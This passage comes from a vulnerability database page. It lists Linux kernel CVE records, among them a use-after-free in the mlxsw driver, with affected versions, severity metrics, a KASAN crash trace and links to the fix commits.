              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: hisilicon: hi3559a: Fix an erroneous devm_kfree()\n\n\u0027p_clk\u0027 is an array allocated just before the for loop for all clk that\nneed to be registered.\nIt is incremented at each loop iteration.\n\nIf a clk_register() call fails, \u0027p_clk\u0027 may point to something different\nfrom what should be freed.\n\nThe best we can do, is to avoid this wrong release of memory."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:02:52.505Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3f8445f1c746fda180a7f75372ed06b24e9cefe2"
        },
        {
          "url": "https://git.kernel.org/stable/c/e0b0d1c46a2ce1e46b79d004a7270fdef872e097"
        },
        {
          "url": "https://git.kernel.org/stable/c/95d1f1228c1bb54803ae57525b76db60e99b37e4"
        },
        {
          "url": "https://git.kernel.org/stable/c/2cc572e0085ebd4b662b74a0f43222bc00df9a00"
        },
        {
          "url": "https://git.kernel.org/stable/c/d575765b1b62e8bdb00af11caa1aabeb01763d9f"
        },
        {
          "url": "https://git.kernel.org/stable/c/64c6a38136b74a2f18c42199830975edd9fbc379"
        }
      ],
      "title": "clk: hisilicon: hi3559a: Fix an erroneous devm_kfree()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27039",
    "datePublished": "2024-05-01T12:53:57.126Z",
    "dateReserved": "2024-02-19T14:20:24.212Z",
    "dateUpdated": "2025-05-04T09:02:52.505Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35854 (GCVE-0-2024-35854)

Vulnerability from cvelistv5 – Published: 2024-05-17 14:47 – Updated: 2025-05-04 09:06

Title

mlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash

Summary

In the Linux kernel, the following vulnerability has been resolved: mlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash The rehash delayed work migrates filters from one region to another according to the number of available credits. The migrated from region is destroyed at the end of the work if the number of credits is non-negative as the assumption is that this is indicative of migration being complete. This assumption is incorrect as a non-negative number of credits can also be the result of a failed migration. The destruction of a region that still has filters referencing it can result in a use-after-free [1]. Fix by not destroying the region if migration failed. [1] BUG: KASAN: slab-use-after-free in mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230 Read of size 8 at addr ffff8881735319e8 by task kworker/0:31/3858 CPU: 0 PID: 3858 Comm: kworker/0:31 Tainted: G W 6.9.0-rc2-custom-00782-gf2275c2157d8 #5 Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019 Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work Call Trace: <TASK> dump_stack_lvl+0xc6/0x120 print_report+0xce/0x670 kasan_report+0xd7/0x110 mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230 mlxsw_sp_acl_ctcam_entry_del+0x2e/0x70 mlxsw_sp_acl_atcam_entry_del+0x81/0x210 mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3cd/0xb50 mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 174: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x8f/0xa0 __kmalloc+0x19c/0x360 mlxsw_sp_acl_tcam_region_create+0xdf/0x9c0 mlxsw_sp_acl_tcam_vregion_rehash_work+0x954/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30 Freed by task 7: kasan_save_stack+0x33/0x60 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x60 poison_slab_object+0x102/0x170 __kasan_slab_free+0x14/0x30 kfree+0xc1/0x290 mlxsw_sp_acl_tcam_region_destroy+0x272/0x310 mlxsw_sp_acl_tcam_vregion_rehash_work+0x731/0x1300 process_one_work+0x8eb/0x19b0 worker_thread+0x6c9/0xf70 kthread+0x2c9/0x3b0 ret_from_fork+0x4d/0x80 ret_from_fork_asm+0x1a/0x30

Severity ?

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e118e7ea24d139287…
	https://git.kernel.org/stable/c/a429a912d6c779807…
	https://git.kernel.org/stable/c/4c89642ca47fb6209…
	https://git.kernel.org/stable/c/813e2ab753a8f8c24…
	https://git.kernel.org/stable/c/311eeaa7b9e26aba5…
	https://git.kernel.org/stable/c/a02687044e124f8cc…
	https://git.kernel.org/stable/c/54225988889931467…

Impacted products

Vendor

Product

Version

Linux

Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < e118e7ea24d1392878ef85926627c6bc640c4388 (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < a429a912d6c779807f4d72a6cc0a1efaaa3613e1 (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < 4c89642ca47fb620914780c7c51d8d1248201121 (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < 813e2ab753a8f8c243a39ede20c2e0adc15f3887 (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < 311eeaa7b9e26aba5b3d57b09859f07d8e9fc049 (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < a02687044e124f8ccb427cd3632124a4e1a7d7c1 (git)
Affected: c9c9af91f1d9a636aecc55302c792538e549a430 , < 54225988889931467a9b55fdbef534079b665519 (git)

Linux

Affected: 5.1
Unaffected: 0 , < 5.1 (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.158 , ≤ 5.15.* (semver)
Unaffected: 6.1.90 , ≤ 6.1.* (semver)
Unaffected: 6.6.30 , ≤ 6.6.* (semver)
Unaffected: 6.8.9 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "c9c9af91f1d9"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "5.1"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "0"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.4.275"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.10.216"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "5.15.158"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.1.90"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.6.30"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.8.9"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.9"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 8.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35854",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-17T16:58:28.959142Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-416",
                "description": "CWE-416 Use After Free",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-16T21:17:40.149Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:47.699Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e118e7ea24d1392878ef85926627c6bc640c4388"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a429a912d6c779807f4d72a6cc0a1efaaa3613e1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4c89642ca47fb620914780c7c51d8d1248201121"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/813e2ab753a8f8c243a39ede20c2e0adc15f3887"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/311eeaa7b9e26aba5b3d57b09859f07d8e9fc049"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a02687044e124f8ccb427cd3632124a4e1a7d7c1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/54225988889931467a9b55fdbef534079b665519"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e118e7ea24d1392878ef85926627c6bc640c4388",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "a429a912d6c779807f4d72a6cc0a1efaaa3613e1",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "4c89642ca47fb620914780c7c51d8d1248201121",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "813e2ab753a8f8c243a39ede20c2e0adc15f3887",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "311eeaa7b9e26aba5b3d57b09859f07d8e9fc049",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "a02687044e124f8ccb427cd3632124a4e1a7d7c1",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            },
            {
              "lessThan": "54225988889931467a9b55fdbef534079b665519",
              "status": "affected",
              "version": "c9c9af91f1d9a636aecc55302c792538e549a430",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.1"
            },
            {
              "lessThan": "5.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.158",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.90",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.30",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.158",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.90",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.30",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash\n\nThe rehash delayed work migrates filters from one region to another\naccording to the number of available credits.\n\nThe migrated from region is destroyed at the end of the work if the\nnumber of credits is non-negative as the assumption is that this is\nindicative of migration being complete. This assumption is incorrect as\na non-negative number of credits can also be the result of a failed\nmigration.\n\nThe destruction of a region that still has filters referencing it can\nresult in a use-after-free [1].\n\nFix by not destroying the region if migration failed.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230\nRead of size 8 at addr ffff8881735319e8 by task kworker/0:31/3858\n\nCPU: 0 PID: 3858 Comm: kworker/0:31 Tainted: G        W          6.9.0-rc2-custom-00782-gf2275c2157d8 #5\nHardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xc6/0x120\n print_report+0xce/0x670\n kasan_report+0xd7/0x110\n mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230\n mlxsw_sp_acl_ctcam_entry_del+0x2e/0x70\n mlxsw_sp_acl_atcam_entry_del+0x81/0x210\n mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3cd/0xb50\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 174:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n __kmalloc+0x19c/0x360\n mlxsw_sp_acl_tcam_region_create+0xdf/0x9c0\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x954/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 7:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n kasan_save_free_info+0x3b/0x60\n poison_slab_object+0x102/0x170\n __kasan_slab_free+0x14/0x30\n kfree+0xc1/0x290\n mlxsw_sp_acl_tcam_region_destroy+0x272/0x310\n mlxsw_sp_acl_tcam_vregion_rehash_work+0x731/0x1300\n process_one_work+0x8eb/0x19b0\n worker_thread+0x6c9/0xf70\n kthread+0x2c9/0x3b0\n ret_from_fork+0x4d/0x80\n ret_from_fork_asm+0x1a/0x30"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:06:54.144Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e118e7ea24d1392878ef85926627c6bc640c4388"
        },
        {
          "url": "https://git.kernel.org/stable/c/a429a912d6c779807f4d72a6cc0a1efaaa3613e1"
        },
        {
          "url": "https://git.kernel.org/stable/c/4c89642ca47fb620914780c7c51d8d1248201121"
        },
        {
          "url": "https://git.kernel.org/stable/c/813e2ab753a8f8c243a39ede20c2e0adc15f3887"
        },
        {
          "url": "https://git.kernel.org/stable/c/311eeaa7b9e26aba5b3d57b09859f07d8e9fc049"
        },
        {
          "url": "https://git.kernel.org/stable/c/a02687044e124f8ccb427cd3632124a4e1a7d7c1"
        },
        {
          "url": "https://git.kernel.org/stable/c/54225988889931467a9b55fdbef534079b665519"
        }
      ],
      "title": "mlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35854",
    "datePublished": "2024-05-17T14:47:30.775Z",
    "dateReserved": "2024-05-17T13:50:33.106Z",
    "dateUpdated": "2025-05-04T09:06:54.144Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35904 (GCVE-0-2024-35904)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:08

Title

selinux: avoid dereference of garbage after mount failure

Summary

In the Linux kernel, the following vulnerability has been resolved: selinux: avoid dereference of garbage after mount failure In case kern_mount() fails and returns an error pointer return in the error branch instead of continuing and dereferencing the error pointer. While on it drop the never read static variable selinuxfs_mount.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/477ed6789eb9f3f4d…
	https://git.kernel.org/stable/c/68784a5d01b8868ff…
	https://git.kernel.org/stable/c/37801a36b4d68892c…

Impacted products

Vendor

Product

Version

Linux

Affected: 0619f0f5e36f12e100ef294f5980cfe7c93ff23e , < 477ed6789eb9f3f4d3568bb977f90c863c12724e (git)
Affected: 0619f0f5e36f12e100ef294f5980cfe7c93ff23e , < 68784a5d01b8868ff85a7926676b6729715fff3c (git)
Affected: 0619f0f5e36f12e100ef294f5980cfe7c93ff23e , < 37801a36b4d68892ce807264f784d818f8d0d39b (git)

Linux

Affected: 4.17
Unaffected: 0 , < 4.17 (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35904",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T14:08:38.593035Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:34:43.960Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.799Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/477ed6789eb9f3f4d3568bb977f90c863c12724e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/68784a5d01b8868ff85a7926676b6729715fff3c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/37801a36b4d68892ce807264f784d818f8d0d39b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/05/30/2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/05/30/1"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "security/selinux/selinuxfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "477ed6789eb9f3f4d3568bb977f90c863c12724e",
              "status": "affected",
              "version": "0619f0f5e36f12e100ef294f5980cfe7c93ff23e",
              "versionType": "git"
            },
            {
              "lessThan": "68784a5d01b8868ff85a7926676b6729715fff3c",
              "status": "affected",
              "version": "0619f0f5e36f12e100ef294f5980cfe7c93ff23e",
              "versionType": "git"
            },
            {
              "lessThan": "37801a36b4d68892ce807264f784d818f8d0d39b",
              "status": "affected",
              "version": "0619f0f5e36f12e100ef294f5980cfe7c93ff23e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "security/selinux/selinuxfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.17"
            },
            {
              "lessThan": "4.17",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.17",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nselinux: avoid dereference of garbage after mount failure\n\nIn case kern_mount() fails and returns an error pointer return in the\nerror branch instead of continuing and dereferencing the error pointer.\n\nWhile on it drop the never read static variable selinuxfs_mount."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:04.160Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/477ed6789eb9f3f4d3568bb977f90c863c12724e"
        },
        {
          "url": "https://git.kernel.org/stable/c/68784a5d01b8868ff85a7926676b6729715fff3c"
        },
        {
          "url": "https://git.kernel.org/stable/c/37801a36b4d68892ce807264f784d818f8d0d39b"
        }
      ],
      "title": "selinux: avoid dereference of garbage after mount failure",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35904",
    "datePublished": "2024-05-19T08:34:57.351Z",
    "dateReserved": "2024-05-17T13:50:33.115Z",
    "dateUpdated": "2025-05-04T09:08:04.160Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26817 (GCVE-0-2024-26817)

Vulnerability from cvelistv5 – Published: 2024-04-13 11:17 – Updated: 2025-11-04 18:29

Title

amdkfd: use calloc instead of kzalloc to avoid integer overflow

Summary

In the Linux kernel, the following vulnerability has been resolved: amdkfd: use calloc instead of kzalloc to avoid integer overflow This uses calloc instead of doing the multiplication which might overflow.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e6721ea845fcb93a7…
	https://git.kernel.org/stable/c/8b0564704255c6b3c…
	https://git.kernel.org/stable/c/fcbd99b3c73309107…
	https://git.kernel.org/stable/c/cbac7de1d9901521e…
